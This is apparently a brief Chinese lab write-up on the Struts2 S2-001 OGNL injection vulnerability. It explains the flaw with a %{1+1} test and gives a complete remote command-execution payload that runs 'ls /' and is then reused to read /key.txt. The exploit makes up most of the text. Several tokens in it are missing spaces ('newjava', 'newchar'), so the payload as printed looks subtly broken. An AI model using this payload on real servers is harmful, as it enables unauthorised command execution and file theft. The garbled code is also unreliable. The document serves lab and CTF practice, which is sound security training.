靶场地址:
https://www.mozhe.cn/bug/detail/MHplaWM3d3NZQ1dWc1ZhNkYvMGVvUT09bW96aGUmozhe
s2-001漏洞原理:用户提交表单时,后端会将OGNL表达式%{value}进行解析
在账号或者密码框中输入%{1+1}点击登陆后,账号或者密码框执行了表达式并且将2显示在输入框中
任意命令执行Exp:
%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"ls","/"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=newjava.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=newchar[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(newjava.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}
输入至账号框,执行ls /命令
利用exp执行cat /key.txt命令